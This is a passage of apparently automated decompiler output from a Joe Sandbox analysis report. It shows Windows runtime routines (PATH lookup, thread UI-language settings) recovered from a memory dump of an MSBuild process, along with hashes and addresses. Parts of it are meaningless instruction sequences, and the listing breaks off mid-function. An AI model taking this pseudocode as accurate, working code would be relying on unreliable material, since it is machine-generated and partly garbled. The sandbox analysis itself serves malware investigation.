                                            				intOrPtr _t255;
                                            				signed int _t258;
                                            				signed int _t265;
                                            				signed int _t268;
                                            				signed int _t276;
                                            				signed int _t282;
                                            				signed int _t284;
                                            				intOrPtr* _t286;
                                            				signed int _t287;
                                            				unsigned int _t290;
                                            				signed int _t294;
                                            				intOrPtr* _t295;
                                            				signed int _t296;
                                            				signed int _t300;
                                            				intOrPtr _t312;
                                            				signed int _t321;
                                            				signed int _t323;
                                            				signed int _t324;
                                            				signed int _t328;
                                            				signed int _t329;
                                            				void* _t331;
                                            				signed int _t332;
                                            				signed int _t334;
                                            				signed int _t337;
                                            				void* _t338;
                                            				void* _t340;
                                            
                                            				_t334 = _t337;
                                            				_t338 = _t337 - 0x4c;
                                            				_v8 =  *0x10fd360 ^ _t334;
                                            				_push(__ebx);
                                            				_push(__esi);
                                            				_push(__edi);
                                            				_t328 = 0x10fb2e8;
                                            				_v56 = _a4;
                                            				_v48 = __edx;
                                            				_v60 = __ecx;
                                            				_t290 = 0;
                                            				_v80 = 0;
                                            				asm("movsd");
                                            				_v64 = 0;
                                            				_v76 = 0;
                                            				_v72 = 0;
                                            				asm("movsd");
                                            				_v44 = 0;
                                            				_v52 = 0;
                                            				_v68 = 0;
                                            				asm("movsd");
                                            				_v32 = 0;
                                            				_v36 = 0;
                                            				asm("movsd");
                                            				_v16 = 0;
                                            				_t282 = 0x48;
                                            				_t310 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                            				_t321 = 0;
                                            				_v37 = _t310;
                                            				if(_v48 <= 0) {
                                            					L16:
                                            					_t45 = _t282 - 0x48; // 0x0
                                            					__eflags = _t45 - 0xfffe;
                                            					if(_t45 > 0xfffe) {
                                            						_t329 = 0xc0000106;
                                            						goto L32;
                                            					} else {
                                            						_t328 = L01024620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t282);
                                            						_v52 = _t328;
                                            						__eflags = _t328;
                                            						if(_t328 == 0) {
                                            							_t329 = 0xc0000017;
                                            							goto L32;
                                            						} else {
                                            							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
                                            							_t50 = _t328 + 0x48; // 0x48
                                            							_t323 = _t50;
                                            							_t310 = _v32;
                                            							 *(_t328 + 0x3c) = _t282;
                                            							_t284 = 0;
                                            							 *((short*)(_t328 + 0x30)) = _v48;
                                            							__eflags = _t310;
                                            							if(_t310 != 0) {
                                            								 *(_t328 + 0x18) = _t323;
                                            								__eflags = _t310 - 0x10f8478;
                                            								 *_t328 = ((0 | _t310 == 0x010f8478) - 0x00000001 & 0xfffffffb) + 7;
                                            								E0104F3E0(_t323,  *((intOrPtr*)(_t310 + 4)),  *_t310 & 0x0000ffff);
                                            								_t310 = _v32;
                                            								_t338 = _t338 + 0xc;
                                            								_t284 = 1;
                                            								__eflags = _a8;
                                            								_t323 = _t323 + (( *_t310 & 0x0000ffff) >> 1) * 2;
                                            								if(_a8 != 0) {
                                            									_t276 = E010939F2(_t323);
                                            									_t310 = _v32;
                                            									_t323 = _t276;
                                            								}
                                            							}
                                            							_t294 = 0;
                                            							_v16 = 0;
                                            							__eflags = _v48;
                                            							if(_v48 <= 0) {
                                            								L31:
                                            								_t329 = _v68;
                                            								__eflags = 0;
                                            								 *((short*)(_t323 - 2)) = 0;
                                            								goto L32;
                                            							} else {
                                            								_t282 = _t328 + _t284 * 4;
                                            								_v56 = _t282;
                                            								do {
                                            									__eflags = _t310;
                                            									if(_t310 != 0) {
                                            										_t237 =  *(_v60 + _t294 * 4);
                                            										__eflags = _t237;
                                            										if(_t237 == 0) {
                                            											goto L30;
                                            										} else {
                                            											__eflags = _t237 == 5;
                                            											if(_t237 == 5) {
                                            												goto L30;
                                            											} else {
                                            												goto L22;
                                            											}
                                            										}
                                            									} else {
                                            										L22:
                                            										 *_t282 =  *(_v60 + _t294 * 4);
                                            										 *(_t282 + 0x18) = _t323;
                                            										_t241 =  *(_v60 + _t294 * 4);
                                            										__eflags = _t241 - 8;
                                            										if(_t241 > 8) {
                                            											goto L56;
                                            										} else {
                                            											switch( *((intOrPtr*)(_t241 * 4 +  &M01032959))) {
                                            												case 0:
                                            													__ax =  *0x10f8488;
                                            													__eflags = __ax;
                                            													if(__ax == 0) {
                                            														goto L29;
                                            													} else {
                                            														__ax & 0x0000ffff = E0104F3E0(__edi,  *0x10f848c, __ax & 0x0000ffff);
                                            														__eax =  *0x10f8488 & 0x0000ffff;
                                            														goto L26;
                                            													}
                                            													goto L108;
                                            												case 1:
                                            													L45:
                                            													E0104F3E0(_t323, _v80, _v64);
                                            													_t271 = _v64;
                                            													goto L26;
                                            												case 2:
                                            													 *0x10f8480 & 0x0000ffff = E0104F3E0(__edi,  *0x10f8484,  *0x10f8480 & 0x0000ffff);
                                            													__eax =  *0x10f8480 & 0x0000ffff;
                                            													__eax = ( *0x10f8480 & 0x0000ffff) >> 1;
                                            													__edi = __edi + __eax * 2;
                                            													goto L28;
                                            												case 3:
                                            													__eax = _v44;
                                            													__eflags = __eax;
                                            													if(__eax == 0) {
                                            														goto L29;
                                            													} else {
                                            														__esi = __eax + __eax;
                                            														__eax = E0104F3E0(__edi, _v72, __esi);
                                            														__edi = __edi + __esi;
                                            														__esi = _v52;
                                            														goto L27;
                                            													}
                                            													goto L108;
                                            												case 4:
                                            													_push(0x2e);
                                            													_pop(__eax);
                                            													 *(__esi + 0x44) = __edi;
                                            													 *__edi = __ax;
                                            													__edi = __edi + 4;
                                            													_push(0x3b);
                                            													_pop(__eax);
                                            													 *(__edi - 2) = __ax;
                                            													goto L29;
                                            												case 5:
                                            													__eflags = _v36;
                                            													if(_v36 == 0) {
                                            														goto L45;
                                            													} else {
                                            														E0104F3E0(_t323, _v76, _v36);
                                            														_t271 = _v36;
                                            													}
                                            													L26:
                                            													_t338 = _t338 + 0xc;
                                            													_t323 = _t323 + (_t271 >> 1) * 2 + 2;
                                            													__eflags = _t323;
                                            													L27:
                                            													_push(0x3b);
                                            													_pop(_t273);
                                            													 *((short*)(_t323 - 2)) = _t273;
                                            													goto L28;
                                            												case 6:
                                            													__ebx =  *0x10f575c;
                                            													__eflags = __ebx - 0x10f575c;
                                            													if(__ebx != 0x10f575c) {
                                            														_push(0x3b);
                                            														_pop(__esi);
                                            														do {
                                            															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                            															E0104F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                            															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                            															__edi = __edi + __eax * 2;
                                            															__edi = __edi + 2;
                                            															 *(__edi - 2) = __si;
                                            															__ebx =  *__ebx;
                                            															__eflags = __ebx - 0x10f575c;
                                            														} while (__ebx != 0x10f575c);
                                            														__esi = _v52;
                                            														__ecx = _v16;
                                            														__edx = _v32;
                                            													}
                                            													__ebx = _v56;
                                            													goto L29;
                                            												case 7:
                                            													 *0x10f8478 & 0x0000ffff = E0104F3E0(__edi,  *0x10f847c,  *0x10f8478 & 0x0000ffff);
                                            													__eax =  *0x10f8478 & 0x0000ffff;
                                            													__eax = ( *0x10f8478 & 0x0000ffff) >> 1;
                                            													__eflags = _a8;
                                            													__edi = __edi + __eax * 2;
                                            													if(_a8 != 0) {
                                            														__ecx = __edi;
                                            														__eax = E010939F2(__ecx);
                                            														__edi = __eax;
                                            													}
                                            													goto L28;
                                            												case 8:
                                            													__eax = 0;
                                            													 *(__edi - 2) = __ax;
                                            													 *0x10f6e58 & 0x0000ffff = E0104F3E0(__edi,  *0x10f6e5c,  *0x10f6e58 & 0x0000ffff);
                                            													 *(__esi + 0x38) = __edi;
                                            													__eax =  *0x10f6e58 & 0x0000ffff;
                                            													__eax = ( *0x10f6e58 & 0x0000ffff) >> 1;
                                            													__edi = __edi + __eax * 2;
                                            													__edi = __edi + 2;
                                            													L28:
                                            													_t294 = _v16;
                                            													_t310 = _v32;
                                            													L29:
                                            													_t282 = _t282 + 4;
                                            													__eflags = _t282;
                                            													_v56 = _t282;
                                            													goto L30;
                                            											}
                                            										}
                                            									}
                                            									goto L108;
                                            									L30:
                                            									_t294 = _t294 + 1;
                                            									_v16 = _t294;
                                            									__eflags = _t294 - _v48;
                                            								} while (_t294 < _v48);
                                            								goto L31;
                                            							}
                                            						}
                                            					}
                                            				} else {
                                            					while(1) {
                                            						L1:
                                            						_t241 =  *(_v60 + _t321 * 4);
                                            						if(_t241 > 8) {
                                            							break;
                                            						}
                                            						switch( *((intOrPtr*)(_t241 * 4 +  &M01032935))) {
                                            							case 0:
                                            								__ax =  *0x10f8488;
                                            								__eflags = __ax;
                                            								if(__ax != 0) {
                                            									__eax = __ax & 0x0000ffff;
                                            									__ebx = __ebx + 2;
                                            									__eflags = __ebx;
                                            									goto L53;
                                            								}
                                            								goto L14;
                                            							case 1:
                                            								L44:
                                            								_t310 =  &_v64;
                                            								_v80 = E01032E3E(0,  &_v64);
                                            								_t282 = _t282 + _v64 + 2;
                                            								goto L13;
                                            							case 2:
                                            								__eax =  *0x10f8480 & 0x0000ffff;
                                            								__ebx = __ebx + __eax;
                                            								__eflags = __dl;
                                            								if(__dl != 0) {
                                            									__eax = 0x10f8480;
                                            									goto L80;
                                            								}
                                            								goto L14;
                                            							case 3:
                                            								__eax = E0101EEF0(0x10f79a0);
                                            								__eax =  &_v44;
                                            								_push(__eax);
                                            								_push(0);
                                            								_push(0);
                                            								_push(4);
                                            								_push(L"PATH");
                                            								_push(0);
                                            								L57();
                                            								__esi = __eax;
                                            								_v68 = __esi;
                                            								__eflags = __esi - 0xc0000023;
                                            								if(__esi != 0xc0000023) {
                                            									L10:
                                            									__eax = E0101EB70(__ecx, 0x10f79a0);
                                            									__eflags = __esi - 0xc0000100;
                                            									if(__esi == 0xc0000100) {
                                            										_v44 = _v44 & 0x00000000;
                                            										__eax = 0;
                                            										_v68 = 0;
                                            										goto L13;
                                            									} else {
                                            										__eflags = __esi;
                                            										if(__esi < 0) {
                                            											L32:
                                            											_t215 = _v72;
                                            											__eflags = _t215;
                                            											if(_t215 != 0) {
                                            												L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
                                            											}
                                            											_t216 = _v52;
                                            											__eflags = _t216;
                                            											if(_t216 != 0) {
                                            												__eflags = _t329;
                                            												if(_t329 < 0) {
                                            													L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
                                            													_t216 = 0;
                                            												}
                                            											}
                                            											goto L36;
                                            										} else {
                                            											__eax = _v44;
                                            											__ebx = __ebx + __eax * 2;
                                            											__ebx = __ebx + 2;
                                            											__eflags = __ebx;
                                            											L13:
                                            											_t290 = _v36;
                                            											goto L14;
                                            										}
                                            									}
                                            								} else {
                                            									__eax = _v44;
                                            									__ecx =  *0x10f7b9c; // 0x0
                                            									_v44 + _v44 =  *[fs:0x30];
                                            									__ecx = __ecx + 0x180000;
                                            									__eax = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                            									_v72 = __eax;
                                            									__eflags = __eax;
                                            									if(__eax == 0) {
                                            										__eax = E0101EB70(__ecx, 0x10f79a0);
                                            										__eax = _v52;
                                            										L36:
                                            										_pop(_t322);
                                            										_pop(_t330);
                                            										__eflags = _v8 ^ _t334;
                                            										_pop(_t283);
                                            										return E0104B640(_t216, _t283, _v8 ^ _t334, _t310, _t322, _t330);
                                            									} else {
                                            										__ecx =  &_v44;
                                            										_push(__ecx);
                                            										_push(_v44);
                                            										_push(__eax);
                                            										_push(4);
                                            										_push(L"PATH");
                                            										_push(0);
                                            										L57();
                                            										__esi = __eax;
                                            										_v68 = __eax;
                                            										goto L10;
                                            									}
                                            								}
                                            								goto L108;
                                            							case 4:
                                            								__ebx = __ebx + 4;
                                            								goto L14;
                                            							case 5:
                                            								_t278 = _v56;
                                            								if(_v56 != 0) {
                                            									_t310 =  &_v36;
                                            									_t280 = E01032E3E(_t278,  &_v36);
                                            									_t290 = _v36;
                                            									_v76 = _t280;
                                            								}
                                            								if(_t290 == 0) {
                                            									goto L44;
                                            								} else {
                                            									_t282 = _t282 + 2 + _t290;
                                            								}
                                            								goto L14;
                                            							case 6:
                                            								__eax =  *0x10f5764 & 0x0000ffff;
                                            								goto L53;
                                            							case 7:
                                            								__eax =  *0x10f8478 & 0x0000ffff;
                                            								__ebx = __ebx + __eax;
                                            								__eflags = _a8;
                                            								if(_a8 != 0) {
                                            									__ebx = __ebx + 0x16;
                                            									__ebx = __ebx + __eax;
                                            								}
                                            								__eflags = __dl;
                                            								if(__dl != 0) {
                                            									__eax = 0x10f8478;
                                            									L80:
                                            									_v32 = __eax;
                                            								}
                                            								goto L14;
                                            							case 8:
                                            								__eax =  *0x10f6e58 & 0x0000ffff;
                                            								__eax = ( *0x10f6e58 & 0x0000ffff) + 2;
                                            								L53:
                                            								__ebx = __ebx + __eax;
                                            								L14:
                                            								_t321 = _t321 + 1;
                                            								if(_t321 >= _v48) {
                                            									goto L16;
                                            								} else {
                                            									_t310 = _v37;
                                            									goto L1;
                                            								}
                                            								goto L108;
                                            						}
                                            					}
                                            					L56:
                                            					_t295 = 0x25;
                                            					asm("int 0x29");
                                            					asm("out 0x28, al");
                                            					asm("o16 sub [ebx], al");
                                            					asm("daa");
                                            					_t245 = _t241 +  *_t295 + _t338 +  *_t295 +  *[es:ecx];
                                            					_t331 = _t328 + 1;
                                            					 *_t282 =  *_t282 - _t245;
                                            					 *0x1f010326 =  *0x1f010326 + _t245;
                                            					_pop(_t286);
                                            					_pop(es);
                                            					 *((intOrPtr*)(_t245 +  &_a1530200319)) =  *((intOrPtr*)(_t245 +  &_a1530200319)) + _t310;
                                            					_pop(es);
                                            					 *_t310 =  *_t310 + _t245;
                                            					 *_t286 =  *_t286 - _t245;
                                            					 *((intOrPtr*)(_t245 - 0x9fefcd8)) =  *((intOrPtr*)(_t245 - 0x9fefcd8)) + _t245;
                                            					asm("daa");
                                            					_t246 = _t245 +  *_t295;
                                            					 *_t286 =  *_t286 - _t246;
                                            					 *((intOrPtr*)(_t331 + 0x28)) =  *((intOrPtr*)(_t331 + 0x28)) + _t295;
                                            					asm("daa");
                                            					asm("fcomp dword [ebx+0x7]");
                                            					 *((intOrPtr*)(_t246 +  *_t295 +  *_t295 +  &_a1546911999)) =  *((intOrPtr*)(_t246 +  *_t295 +  *_t295 +  &_a1546911999)) + _t331;
                                            					es = ds;
                                            					_t340 = _t338 + _t295;
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					_push(0x20);
                                            					_push(0x10dff00);
                                            					E0105D08C(_t286, _t323, _t331);
                                            					_v44 =  *[fs:0x18];
                                            					_t324 = 0;
                                            					 *_a24 = 0;
                                            					_t287 = _a12;
                                            					__eflags = _t287;
                                            					if(_t287 == 0) {
                                            						_t251 = 0xc0000100;
                                            					} else {
                                            						_v8 = 0;
                                            						_t332 = 0xc0000100;
                                            						_v52 = 0xc0000100;
                                            						_t253 = 4;
                                            						while(1) {
                                            							_v40 = _t253;
                                            							__eflags = _t253;
                                            							if(_t253 == 0) {
                                            								break;
                                            							}
                                            							_t300 = _t253 * 0xc;
                                            							_v48 = _t300;
                                            							__eflags = _t287 -  *((intOrPtr*)(_t300 + 0xfe1664));
                                            							if(__eflags <= 0) {
                                            								if(__eflags == 0) {
                                            									_t268 = E0104E5C0(_a8,  *((intOrPtr*)(_t300 + 0xfe1668)), _t287);
                                            									_t340 = _t340 + 0xc;
                                            									__eflags = _t268;
                                            									if(__eflags == 0) {
                                            										_t332 = E010851BE(_t287,  *((intOrPtr*)(_v48 + 0xfe166c)), _a16, _t324, _t332, __eflags, _a20, _a24);
                                            										_v52 = _t332;
                                            										break;
                                            									} else {
                                            										_t253 = _v40;
                                            										goto L62;
                                            									}
                                            									goto L70;
                                            								} else {
                                            									L62:
                                            									_t253 = _t253 - 1;
                                            									continue;
                                            								}
                                            							}
                                            							break;
                                            						}
                                            						_v32 = _t332;
                                            						__eflags = _t332;
                                            						if(_t332 < 0) {
                                            							__eflags = _t332 - 0xc0000100;
                                            							if(_t332 == 0xc0000100) {
                                            								_t296 = _a4;
                                            								__eflags = _t296;
                                            								if(_t296 != 0) {
                                            									_v36 = _t296;
                                            									__eflags =  *_t296 - _t324;
                                            									if( *_t296 == _t324) {
                                            										_t332 = 0xc0000100;
                                            										goto L76;
                                            									} else {
                                            										_t312 =  *((intOrPtr*)(_v44 + 0x30));
                                            										_t255 =  *((intOrPtr*)(_t312 + 0x10));
                                            										__eflags =  *((intOrPtr*)(_t255 + 0x48)) - _t296;
                                            										if( *((intOrPtr*)(_t255 + 0x48)) == _t296) {
                                            											__eflags =  *(_t312 + 0x1c);
                                            											if( *(_t312 + 0x1c) == 0) {
                                            												L106:
                                            												_t332 = E01032AE4( &_v36, _a8, _t287, _a16, _a20, _a24);
                                            												_v32 = _t332;
                                            												__eflags = _t332 - 0xc0000100;
                                            												if(_t332 != 0xc0000100) {
                                            													goto L69;
                                            												} else {
                                            													_t324 = 1;
                                            													_t296 = _v36;
                                            													goto L75;
                                            												}
                                            											} else {
                                            												_t258 = E01016600( *(_t312 + 0x1c));
                                            												__eflags = _t258;
                                            												if(_t258 != 0) {
                                            													goto L106;
                                            												} else {
                                            													_t296 = _a4;
                                            													goto L75;
                                            												}
                                            											}
                                            										} else {
                                            											L75:
                                            											_t332 = E01032C50(_t296, _a8, _t287, _a16, _a20, _a24, _t324);
                                            											L76:
                                            											_v32 = _t332;
                                            											goto L69;
                                            										}
                                            									}
                                            									goto L108;
                                            								} else {
                                            									E0101EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            									_v8 = 1;
                                            									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                            									_t332 = _a24;
                                            									_t265 = E01032AE4( &_v36, _a8, _t287, _a16, _a20, _t332);
                                            									_v32 = _t265;
                                            									__eflags = _t265 - 0xc0000100;
                                            									if(_t265 == 0xc0000100) {
                                            										_v32 = E01032C50(_v36, _a8, _t287, _a16, _a20, _t332, 1);
                                            									}
                                            									_v8 = _t324;
                                            									E01032ACB();
                                            								}
                                            							}
                                            						}
                                            						L69:
                                            						_v8 = 0xfffffffe;
                                            						_t251 = _t332;
                                            					}
                                            					L70:
                                            					return E0105D0D1(_t251);
                                            				}
                                            				L108:
                                            			}





















































                                            0x01075cdf
                                            0x01075ce5
                                            0x00000000
                                            0x01075ceb
                                            0x01075ced
                                            0x01075cee
                                            0x00000000
                                            0x01075cee
                                            0x01075cb1
                                            0x01075cb4
                                            0x01075cb9
                                            0x01075cbb
                                            0x00000000
                                            0x01075cbd
                                            0x01075cbd
                                            0x00000000
                                            0x01075cbd
                                            0x01075cbb
                                            0x01032ab1
                                            0x01032ab1
                                            0x01032ac4
                                            0x01032ac6
                                            0x01032ac6
                                            0x00000000
                                            0x01032ac6
                                            0x01032aab
                                            0x00000000
                                            0x01032a00
                                            0x01032a09
                                            0x01032a0e
                                            0x01032a21
                                            0x01032a24
                                            0x01032a35
                                            0x01032a3a
                                            0x01032a3d
                                            0x01032a42
                                            0x01032a59
                                            0x01032a59
                                            0x01032a5c
                                            0x01032a5f
                                            0x01032a5f
                                            0x010329fa
                                            0x010329f3
                                            0x01032a64
                                            0x01032a64
                                            0x01032a6b
                                            0x01032a6b
                                            0x01032a6d
                                            0x01032a72
                                            0x01032a72
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PATH
                                            • API String ID: 0-1036084923
                                            • Opcode ID: d19912a21a1fd2e9cf73c168848423dba3cb566c0cd3d31c2fed1102e5cb1302
                                            • Instruction ID: 5e097b6837788d62d9ae39ed44373ac4d051e7958991c37aab78170d28c2c84d
                                            • Opcode Fuzzy Hash: d19912a21a1fd2e9cf73c168848423dba3cb566c0cd3d31c2fed1102e5cb1302
                                            • Instruction Fuzzy Hash: B4C181B5E00219DBDB25DF99D881BFDBBF9FF88740F048069E981AB250D734A941CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E0103FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                            				char _v5;
                                            				signed int _v8;
                                            				signed int _v12;
                                            				char _v16;
                                            				char _v17;
                                            				char _v20;
                                            				signed int _v24;
                                            				char _v28;
                                            				char _v32;
                                            				signed int _v40;
                                            				void* __ecx;
                                            				void* __edi;
                                            				void* __ebp;
                                            				signed int _t73;
                                            				intOrPtr* _t75;
                                            				signed int _t77;
                                            				signed int _t79;
                                            				signed int _t81;
                                            				intOrPtr _t83;
                                            				intOrPtr _t85;
                                            				intOrPtr _t86;
                                            				signed int _t91;
                                            				signed int _t94;
                                            				signed int _t95;
                                            				signed int _t96;
                                            				signed int _t106;
                                            				signed int _t108;
                                            				signed int _t114;
                                            				signed int _t116;
                                            				signed int _t118;
                                            				signed int _t122;
                                            				signed int _t123;
                                            				void* _t129;
                                            				signed int _t130;
                                            				void* _t132;
                                            				intOrPtr* _t134;
                                            				signed int _t138;
                                            				signed int _t141;
                                            				signed int _t147;
                                            				intOrPtr _t153;
                                            				signed int _t154;
                                            				signed int _t155;
                                            				signed int _t170;
                                            				void* _t174;
                                            				signed int _t176;
                                            				signed int _t177;
                                            
                                            				_t129 = __ebx;
                                            				_push(_t132);
                                            				_push(__esi);
                                            				_t174 = _t132;
                                            				_t73 =  !( *( *(_t174 + 0x18)));
                                            				if(_t73 >= 0) {
                                            					L5:
                                            					return _t73;
                                            				} else {
                                            					E0101EEF0(0x10f7b60);
                                            					_t134 =  *0x10f7b84; // 0x771a7b80
                                            					_t2 = _t174 + 0x24; // 0x24
                                            					_t75 = _t2;
                                            					if( *_t134 != 0x10f7b80) {
                                            						_push(3);
                                            						asm("int 0x29");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						asm("int3");
                                            						_push(0x10f7b60);
                                            						_t170 = _v8;
                                            						_v28 = 0;
                                            						_v40 = 0;
                                            						_v24 = 0;
                                            						_v17 = 0;
                                            						_v32 = 0;
                                            						__eflags = _t170 & 0xffff7cf2;
                                            						if((_t170 & 0xffff7cf2) != 0) {
                                            							L43:
                                            							_t77 = 0xc000000d;
                                            						} else {
                                            							_t79 = _t170 & 0x0000000c;
                                            							__eflags = _t79;
                                            							if(_t79 != 0) {
                                            								__eflags = _t79 - 0xc;
                                            								if(_t79 == 0xc) {
                                            									goto L43;
                                            								} else {
                                            									goto L9;
                                            								}
                                            							} else {
                                            								_t170 = _t170 | 0x00000008;
                                            								__eflags = _t170;
                                            								L9:
                                            								_t81 = _t170 & 0x00000300;
                                            								__eflags = _t81 - 0x300;
                                            								if(_t81 == 0x300) {
                                            									goto L43;
                                            								} else {
                                            									_t138 = _t170 & 0x00000001;
                                            									__eflags = _t138;
                                            									_v24 = _t138;
                                            									if(_t138 != 0) {
                                            										__eflags = _t81;
                                            										if(_t81 != 0) {
                                            											goto L43;
                                            										} else {
                                            											goto L11;
                                            										}
                                            									} else {
                                            										L11:
                                            										_push(_t129);
                                            										_t77 = E01016D90( &_v20);
                                            										_t130 = _t77;
                                            										__eflags = _t130;
                                            										if(_t130 >= 0) {
                                            											_push(_t174);
                                            											__eflags = _t170 & 0x00000301;
                                            											if((_t170 & 0x00000301) == 0) {
                                            												_t176 = _a8;
                                            												__eflags = _t176;
                                            												if(__eflags == 0) {
                                            													L64:
                                            													_t83 =  *[fs:0x18];
                                            													_t177 = 0;
                                            													__eflags =  *(_t83 + 0xfb8);
                                            													if( *(_t83 + 0xfb8) != 0) {
                                            														E010176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                            														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                            													}
                                            													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                            													goto L15;
                                            												} else {
                                            													asm("sbb edx, edx");
                                            													_t114 = E010A8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                            													__eflags = _t114;
                                            													if(_t114 < 0) {
                                            														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                            														E0100B150();
                                            													}
                                            													_t116 = E010A6D81(_t176,  &_v16);
                                            													__eflags = _t116;
                                            													if(_t116 >= 0) {
                                            														__eflags = _v16 - 2;
                                            														if(_v16 < 2) {
                                            															L56:
                                            															_t118 = E010175CE(_v20, 5, 0);
                                            															__eflags = _t118;
                                            															if(_t118 < 0) {
                                            																L67:
                                            																_t130 = 0xc0000017;
                                            																goto L32;
                                            															} else {
                                            																__eflags = _v12;
                                            																if(_v12 == 0) {
                                            																	goto L67;
                                            																} else {
                                            																	_t153 =  *0x10f8638; // 0x0
                                            																	_t122 = L010138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                            																	_t154 = _v12;
                                            																	_t130 = _t122;
                                            																	__eflags = _t130;
                                            																	if(_t130 >= 0) {
                                            																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                            																		__eflags = _t123;
                                            																		if(_t123 != 0) {
                                            																			_t155 = _a12;
                                            																			__eflags = _t155;
                                            																			if(_t155 != 0) {
                                            																				 *_t155 = _t123;
                                            																			}
                                            																			goto L64;
                                            																		} else {
                                            																			E010176E2(_t154);
                                            																			goto L41;
                                            																		}
                                            																	} else {
                                            																		E010176E2(_t154);
                                            																		_t177 = 0;
                                            																		goto L18;
                                            																	}
                                            																}
                                            															}
                                            														} else {
                                            															__eflags =  *_t176;
                                            															if( *_t176 != 0) {
                                            																goto L56;
                                            															} else {
                                            																__eflags =  *(_t176 + 2);
                                            																if( *(_t176 + 2) == 0) {
                                            																	goto L64;
                                            																} else {
                                            																	goto L56;
                                            																}
                                            															}
                                            														}
                                            													} else {
                                            														_t130 = 0xc000000d;
                                            														goto L32;
                                            													}
                                            												}
                                            												goto L35;
                                            											} else {
                                            												__eflags = _a8;
                                            												if(_a8 != 0) {
                                            													_t77 = 0xc000000d;
                                            												} else {
                                            													_v5 = 1;
                                            													L0103FCE3(_v20, _t170);
                                            													_t177 = 0;
                                            													__eflags = 0;
                                            													L15:
                                            													_t85 =  *[fs:0x18];
                                            													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                            													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                            														L18:
                                            														__eflags = _t130;
                                            														if(_t130 != 0) {
                                            															goto L32;
                                            														} else {
                                            															__eflags = _v5 - _t130;
                                            															if(_v5 == _t130) {
                                            																goto L32;
                                            															} else {
                                            																_t86 =  *[fs:0x18];
                                            																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                            																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                            																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                            																}
                                            																__eflags = _t177;
                                            																if(_t177 == 0) {
                                            																	L31:
                                            																	__eflags = 0;
                                            																	L010170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                            																	goto L32;
                                            																} else {
                                            																	__eflags = _v24;
                                            																	_t91 =  *(_t177 + 0x20);
                                            																	if(_v24 != 0) {
                                            																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                            																		goto L31;
                                            																	} else {
                                            																		_t141 = _t91 & 0x00000040;
                                            																		__eflags = _t170 & 0x00000100;
                                            																		if((_t170 & 0x00000100) == 0) {
                                            																			__eflags = _t141;
                                            																			if(_t141 == 0) {
                                            																				L74:
                                            																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                            																				goto L27;
                                            																			} else {
                                            																				_t177 = E0103FD22(_t177);
                                            																				__eflags = _t177;
                                            																				if(_t177 == 0) {
                                            																					goto L42;
                                            																				} else {
                                            																					_t130 = E0103FD9B(_t177, 0, 4);
                                            																					__eflags = _t130;
                                            																					if(_t130 != 0) {
                                            																						goto L42;
                                            																					} else {
                                            																						_t68 = _t177 + 0x20;
                                            																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                            																						__eflags =  *_t68;
                                            																						_t91 =  *(_t177 + 0x20);
                                            																						goto L74;
                                            																					}
                                            																				}
                                            																			}
                                            																			goto L35;
                                            																		} else {
                                            																			__eflags = _t141;
                                            																			if(_t141 != 0) {
                                            																				_t177 = E0103FD22(_t177);
                                            																				__eflags = _t177;
                                            																				if(_t177 == 0) {
                                            																					L42:
                                            																					_t77 = 0xc0000001;
                                            																					goto L33;
                                            																				} else {
                                            																					_t130 = E0103FD9B(_t177, 0, 4);
                                            																					__eflags = _t130;
                                            																					if(_t130 != 0) {
                                            																						goto L42;
                                            																					} else {
